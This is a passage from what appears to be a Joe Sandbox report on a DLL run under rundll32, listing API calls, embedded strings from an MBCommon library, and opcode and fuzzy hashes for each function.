      • Opcode ID: fa68690fadab714d053d2eb5b514d88ae2da970e409a4c86a8b986e7abd24159
      • Instruction ID: ed980101c0dda834f3209737b7ad7eaa71b32689e90ce2458d719ec637e924eb
      • Opcode Fuzzy Hash: fa68690fadab714d053d2eb5b514d88ae2da970e409a4c86a8b986e7abd24159
      • Instruction Fuzzy Hash: F361AC76204B4892E7A2CF11F8947DA77A5F78C7A4F948116EA8E43B65DF38C64DCB00
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: Process$ErrorLast_invalid_parameter_noinfo_noreturn$FileImageNameOpen$CloseHandle
      • String ID: D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\ProcessUtils.cpp$GetProcessImageFileName for [%d] failed with error [%d]. Cannot get the process path!$OpenProcess call with pid [%d] failed with error [%d]. Cannot get the process path!$ProcessUtils$mb::common::system::ProcessUtils::GetProcessPath
      • API String ID: 1575040863-3696580403
      • Opcode ID: 29f233a9cbda2f60c6aaac86fea4f902b3204e52b0f38eaf970a43707461ded7
      • Instruction ID: e96932dfd46c146b027ab0e3fe9f41d0e7c323a40ef06e91f34071805e990d49
      • Opcode Fuzzy Hash: 29f233a9cbda2f60c6aaac86fea4f902b3204e52b0f38eaf970a43707461ded7
      • Instruction Fuzzy Hash: EFA1AD72711F48C5EB92CF65E4883DD23A1E78DBE5F408621EA9D1BB99DE78C649C300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
      • API String ID: 808467561-2761157908
      • Opcode ID: 155f8ec017a0ba7ffc1716aa04d01c066c65c88c059d2bce09e4d6e3f582fb89
      • Instruction ID: e64712b9f006329b85b2faee8822a5d2b8dc3ae68b58e218b1303014f36bdc9b
      • Opcode Fuzzy Hash: 155f8ec017a0ba7ffc1716aa04d01c066c65c88c059d2bce09e4d6e3f582fb89
      • Instruction Fuzzy Hash: 0AB2E3727142888BF7A6CF64D8487ED77A1F3583A8F919115DA0A57E88DF39DB08CB40
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID:
      • String ID: DEBUG$Date{0}Time{0}Tick Count{0}Process ID{0}Thread ID{0}Log Level{0}Context Tag{0}Function Name{0}File Name{0}Line Number{0}Message$ERROR$INFO$NONE$TRACE$UNKNOWN$WARNING${0}$O)
      • API String ID: 0-1175394839
      • Opcode ID: 3ec266ce1dfb9ad681a2d774538e3080bea715b79c42faf1737142f89fa23282
      • Instruction ID: e728865471310377dd45c6c8a3a48b35043e9632576cc2786ca7e8ba21f050cb
      • Opcode Fuzzy Hash: 3ec266ce1dfb9ad681a2d774538e3080bea715b79c42faf1737142f89fa23282
      • Instruction Fuzzy Hash: 55B1CF72610B8881EB52DF25E4943DD7361F78DBD8FA1D212EAAC076A5DF78C689C340
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$ExclusiveLock$Acquire$Concurrency::cancel_current_taskDeviceDriveLogicalQueryReleaseStrings
      • String ID:
      • API String ID: 4260757983-0
      • Opcode ID: d557855fa708ce906f49ab260f81f0c610c0e0c19cfdf631ec2296b3be148232
      • Instruction ID: db5d558c1e9556029db17fd4af993c84ea7a7e714190a018784b6b6843ff1089
      • Opcode Fuzzy Hash: d557855fa708ce906f49ab260f81f0c610c0e0c19cfdf631ec2296b3be148232
      • Instruction Fuzzy Hash: 19025172B10F8985FB42DB65E4453ED2362A78D7E8F509311EAA8166E9DF78C688C300
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
      • String ID:
      • API String ID: 1239891234-0
      • Opcode ID: 8b76dab4a3857abd9779c3005433230d7221e9e5bf1173b1d060ab8efcc8499b
      • Instruction ID: 6fbe0a5ab35caa0a7a8088efd5404cf088294dffa798bee2e61c09e7e7bb2285
      • Opcode Fuzzy Hash: 8b76dab4a3857abd9779c3005433230d7221e9e5bf1173b1d060ab8efcc8499b
      • Instruction Fuzzy Hash: 04319236214F8486DBA1CF25E8843DE73A0F78C768F544116EA9D47BA5EF38C649CB00
      APIs
      Strings
      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00000001801078CB
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: DebugDebuggerErrorLastOutputPresentString
      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
      • API String ID: 389471666-631824599
      • Opcode ID: ac4f2ae6db917f4f87e37bddf6db85f629462927a0db851ef5fe58545d8aa7dc
      • Instruction ID: c62aa922f7e8e0fdb41f07d84f43fcc2a9736de30d8fad2d158327afe1407b89
      • Opcode Fuzzy Hash: ac4f2ae6db917f4f87e37bddf6db85f629462927a0db851ef5fe58545d8aa7dc
      • Instruction Fuzzy Hash: 13115E32310B88A7F786DB22E6583E933A1FB4C365F44C025CB5942A61EF78D6B8C710
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
      • String ID:
      • API String ID: 2933794660-0
      • Opcode ID: 8cb0d471114c2351560cf57080cdf1a54f3117c3f47b117ae357acb3e1abe895
      • Instruction ID: eb508fc792b5aef0349723997834eec7494c9d46332be5394ead55717787b15d
      • Opcode Fuzzy Hash: 8cb0d471114c2351560cf57080cdf1a54f3117c3f47b117ae357acb3e1abe895
      • Instruction Fuzzy Hash: 22110C36711F048AEB81CF64E8593E833A5F75DB68F441E25EE6D86BA4DF78C2588340
      APIs
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: memcpy_s
      • String ID:
      • API String ID: 1502251526-0
      • Opcode ID: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
      • Instruction ID: dea16717a6459461c981bc694ef17a16d0c3dd845920b794801fa674b0c0ca1a
      • Opcode Fuzzy Hash: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
      • Instruction Fuzzy Hash: F9C139B271428987EB75CF19E04D79AB7A1F388B94F40C225DB8A57784DB39DA09CB40
      APIs
      • _invalid_parameter_noinfo.LIBCMT ref: 0000000180126BE8
      • SetConsoleCtrlHandler.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180125818), ref: 0000000180126E04
      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180125818), ref: 0000000180126E17
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: ConsoleCtrlErrorHandlerLast_invalid_parameter_noinfo
      • String ID:
      • API String ID: 2654339681-0
      • Opcode ID: b03e703916e1046b10f3869a232b6324562162d81a8b82174c66de663d7c94bc
      • Instruction ID: 0cad5d6a7708ec7627c2b370556e12f9c2e07c11c99113340310ae9708483d7b
      • Opcode Fuzzy Hash: b03e703916e1046b10f3869a232b6324562162d81a8b82174c66de663d7c94bc
      • Instruction Fuzzy Hash: F6C1BEB260164C86FAE7DB28D45C3EA27A1E79C7A2F55C425DA4A077F5DE38CB4D8300
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000006.00000002.3272158424.0000000180001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000180000000, based on PE: true
      • Associated: 00000006.00000002.3272133467.0000000180000000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180145000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272320544.0000000180154000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272444377.00000001801FF000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272472457.0000000180200000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272499023.0000000180201000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272519571.0000000180202000.00000008.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272546613.0000000180203000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272574474.0000000180207000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000006.00000002.3272601862.0000000180209000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
      Similarity
      • API ID: InfoLocale
      • String ID: GetLocaleInfoEx
      • API String ID: 2299586839-2904428671
      • Opcode ID: c58fa79b402e6919386ef5694a0162a6e22420b1c41b766446516c9eeb2e969a
      • Instruction ID: 8364a61e272f7459822ab890d2611de5c775059b9af069b8d611d1f8da2e32a8
      • Opcode Fuzzy Hash: c58fa79b402e6919386ef5694a0162a6e22420b1c41b766446516c9eeb2e969a
      • Instruction Fuzzy Hash: D601A734700A448AE7C29B86B4483DBB7A1BB9CFE0F95C0259E4913B66CE38CA498340
      APIs
      Similarity
      • API ID: ExceptionRaise_clrfp
      • String ID:
      • API String ID: 15204871-0
      • Opcode ID: 351bdbe885c120d7f1782725b4111b1a2e01d45fdac977c756f5949d11557b11
      • Instruction ID: a5246351395ead6ace41139514bdf3c781a7c67c369d30a528861335f28cd911
      • Opcode Fuzzy Hash: 351bdbe885c120d7f1782725b4111b1a2e01d45fdac977c756f5949d11557b11
      • Instruction Fuzzy Hash: DDB11F77600B888FEB56CF29C88A39D7BA0F348B68F16C915DB5987BA4CB39C555C700
      Strings
      Similarity
      • API ID:
      • String ID: $
      • API String ID: 0-227171996
      • Opcode ID: f37e5461d795ae9f8fc3c5a30e3aa09c1da45a80f3de5b0be8a66d2bc7a72cad
      • Instruction ID: 49e058d1f621dd75d3ae7e20055d9f1bf5ae8eb1af5a11b8716a30c85fa3d411
      • Opcode Fuzzy Hash: f37e5461d795ae9f8fc3c5a30e3aa09c1da45a80f3de5b0be8a66d2bc7a72cad
      • Instruction Fuzzy Hash: 44E1D732204E4886FBEE8E2981583AD3BA1F74DB68F98E215DA46077D4DF35CA59C700
      Strings
      Similarity
      • API ID:
      • String ID: e+000$gfff
      • API String ID: 0-3030954782
      • Opcode ID: a0b4a98d576a10a6e3a0da15dd5e8e4746293ad3541659e3aa334c552677f52b
      • Instruction ID: f6e58dc7970a1d26dd0adf9c08be4621f1eb0c8160bce8016cb9768a45f6ae82
      • Opcode Fuzzy Hash: a0b4a98d576a10a6e3a0da15dd5e8e4746293ad3541659e3aa334c552677f52b
      • Instruction Fuzzy Hash: D6517AB27146CC46E7A6CE35A808799BB91E35CBA4F49D221CBA44BAC5CF39C649C700
      APIs
      Similarity
      • API ID: ErrorLast
      • String ID:
      • API String ID: 1452528299-0
      • Opcode ID: 32ae0cb38b3b69d83d12af6681f0a3ce2392bd4ef5a70b5fea58a58a172fff2d
      • Instruction ID: ecb3a429b116fcf64368373afd7e3ac527559c729b42e18b68529803189b8f9e
      • Opcode Fuzzy Hash: 32ae0cb38b3b69d83d12af6681f0a3ce2392bd4ef5a70b5fea58a58a172fff2d
      • Instruction Fuzzy Hash: 1DD1C3B260478886E7F6DF25E0483A97B90F78D7A4F54C225DB8947B95DF7CC6488B00
      APIs
      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00000001801301F7,?,?,?,?,?,?,?,?,00000000,0000000180138A00), ref: 000000018012FDF7
      Similarity
      • API ID: EnumLocalesSystem
      • String ID:
      • API String ID: 2099609381-0
      • Opcode ID: 7a83e8bc964b767d18a3dccc9881b21e24547f6a8c854c59aa3a223554baed0a
      • Instruction ID: 02696fc78f1fcaa263e9141234fab4a06aa5e1d6719a252db0625d7baa23e7be
      • Opcode Fuzzy Hash: 7a83e8bc964b767d18a3dccc9881b21e24547f6a8c854c59aa3a223554baed0a
      • Instruction Fuzzy Hash: B4F03CB2300B4887E785DB29E8983DA7367F79CBC0F94D029EA4983765DE78C6598300
      Strings
      Similarity
      • API ID:
      • String ID: gfffffff
      • API String ID: 0-1523873471
      • Opcode ID: 3c05b74dc7d3b59526d61f6f1df35647b34b7f0f29bb2ff571977b3eaa776d9e
      • Instruction ID: 0ad7334c65485f9f62971b9ca8978406d82dbfa592b7c05e8838b2e1b4e3bdfb
      • Opcode Fuzzy Hash: 3c05b74dc7d3b59526d61f6f1df35647b34b7f0f29bb2ff571977b3eaa776d9e
      • Instruction Fuzzy Hash: 39A145B37057CC86EBA6CB29A4147EA7B90E359BE4F05C122DF8947795EA3DC609C700
      Strings
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: 8e8e8880b988a86fe12b3d04fec3431f0dcfae1117074ff7f9f921cd0f14eac8
      • Instruction ID: 92ca1c19978f7e98e1dc79a382196f8d49c5b8aae83ff91a3c9d075087d87231
      • Opcode Fuzzy Hash: 8e8e8880b988a86fe12b3d04fec3431f0dcfae1117074ff7f9f921cd0f14eac8
      • Instruction Fuzzy Hash: 7AB1A172105F5886EBAA8F29C0983EC3BA0F74DB68F28E116CB4A47395CF31C659C755
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
      • Instruction ID: b266238800c3099d4c7d16965a207078b382afbec0b3959330b3dbe103fe048b
      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
      • Instruction Fuzzy Hash: D2518236320E5882E7AA8B29C04839C37B1F74DB78F24A111DE5917B98CB36DA57D740
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
      • Instruction ID: 03f34c0eb881ddf5f502b3628062a6a47f64f1b8239020765bd4c6c594425803
      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
      • Instruction Fuzzy Hash: 37518076314E5886E7AA8F29D04839D37B1E74CF78F24A111CE4917BA8DB36DA47C780
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
      • Instruction ID: c90048feb344b5a07ce75a192268b1176897b3dbb599d5942664696d53f56c25
      • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
      • Instruction Fuzzy Hash: 77517F36710E5886E7AA8B29D04C39837B1E34DB78F24A111CE4917BE8CB36DA47C780
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: bf36178eee3e05a9df7ae4174492d72a955a1e5a924f83978aff5b384c443cef
      • Instruction ID: cc2829d54de1894aea31ff42c54a9275b60a420315146979c47b57ee77199df6
      • Opcode Fuzzy Hash: bf36178eee3e05a9df7ae4174492d72a955a1e5a924f83978aff5b384c443cef
      • Instruction Fuzzy Hash: FA517F36320E5886E7AA8B29D05839C77B0E74CB7CF28E111CE4917B95DB36CA5BC740
      APIs
      Strings
      Similarity
      • API ID: CreateErrorFileLast
      • String ID: %ws verification status - %x - IsMbam = %u$D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\FileVerify.cpp$Error allocating memory for file data$File Not Found - %x$File Size Error$MbCommonSigVerify$Read file Error$VerifyFile$VerifyFile attempting to open %ws
      • API String ID: 1214770103-1110068639
      • Opcode ID: 307ac1770580ba3d592c58be44ea0f0f5cd9a0c4409d3336b534dacfa44d8c4d
      • Instruction ID: 11652f6c9eee8c16f10a3420f6e9143ef996b92be0c75af00192d30ce4594539
      • Opcode Fuzzy Hash: 307ac1770580ba3d592c58be44ea0f0f5cd9a0c4409d3336b534dacfa44d8c4d
      • Instruction Fuzzy Hash: 7B815C76204B8886E7A1CB11E84479E77A4F78DBE4F408115EA9D47BA6DF3CC608CB00
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: \\.\Globalroot
      • API String ID: 3668304517-3084389310
      • Opcode ID: c1c51882aed7f50c725de7d56c11ff9d4f12b11390d09ca5d81619b85898036f
      • Instruction ID: 63d7ba85a87c813fe84413dbf665f9926105d667c37b972e7311ef1f595220e1
      • Opcode Fuzzy Hash: c1c51882aed7f50c725de7d56c11ff9d4f12b11390d09ca5d81619b85898036f
      • Instruction Fuzzy Hash: BD418472B11E4985FF47EB78D0493ED12229B8D7F4F40AB01BA6816AEADE65C249C340
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$EventFileInfoResetVersion$LibraryLoadMultipleMutexObjectsQueryReleaseSizeValueWait
      • String ID: D:\Jenkins\workspace\N_MBCommon-vs2022\src\mbcommon\DynamicLibrary.cpp$Failed to load '%s', %s$Failed to load function ptrs for '%s'$File version %u.%u.%u.%u for '%s'$mb::common::system::DynamicLibrary::Load
      • API String ID: 4026781392-3082813674
      • Opcode ID: b1015c23e17ff9f6e18201f766be76b5944456af77c8d30d255385afce82add6
      • Instruction ID: cbabf07e28f1668f3db32a59947f7a559444b3bbfa617106ad4ec1bbbac74f0c
      • Opcode Fuzzy Hash: b1015c23e17ff9f6e18201f766be76b5944456af77c8d30d255385afce82add6
      • Instruction Fuzzy Hash: 14D1CD72B10B4895EB91DF65E4843EC33B1F798BD8F008616EA5D17AA9DF38C699C340
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: \\?\
      • API String ID: 3668304517-4282027825
      • Opcode ID: c153c970744e3ff2ac1a733991df761227dc1e397997b5b26c4c23c3766a7f33
      • Instruction ID: 63a2ac9ff495613dcd4add744bea60c538b8f00e60c4357e3b1501531ff59648
      • Opcode Fuzzy Hash: c153c970744e3ff2ac1a733991df761227dc1e397997b5b26c4c23c3766a7f33
      • Instruction Fuzzy Hash: 3951B672B11F4985FF46DB78D0493EC23629B8D7F4F40D701AA6C16AEADE65C289C380
      APIs
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID:
      • API String ID: 3668304517-0
      • Opcode ID: 1aceb5f987f3b3742d416ac2d6fb94983d95fa97e2ad7047d90991908b41cd68
      • Instruction ID: 37caab9f01e1003b77e7c8090618f661dfee8657723bdb68d57d04bec796e96a
      • Opcode Fuzzy Hash: 1aceb5f987f3b3742d416ac2d6fb94983d95fa97e2ad7047d90991908b41cd68
      • Instruction Fuzzy Hash: 08618272B11E4985FF46DB78C0493ED13229B8D7F8F409B01BA6C1A6EADE65C289C340
      APIs
      Similarity
      • API ID: Value$ErrorLast$Heap$AllocateFree
      • String ID:
      • API String ID: 3174826731-0
      • Opcode ID: 8ccb908dd8e4ff57505e64b5df28a089de3b94dea4da7d119cfdfabe832b7545
      • Instruction ID: 525182d9fe85fdeaa0cb1f2338849a7f9d30ddb055702e12c3b71842699ac447
      • Opcode Fuzzy Hash: 8ccb908dd8e4ff57505e64b5df28a089de3b94dea4da7d119cfdfabe832b7545
      • Instruction Fuzzy Hash: 3D41537030120C47FAEBE7B1699D3EA63835B4C7B0F94D724A9364B6D6ED68D6498300
      APIs
      Strings
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$AddressProc
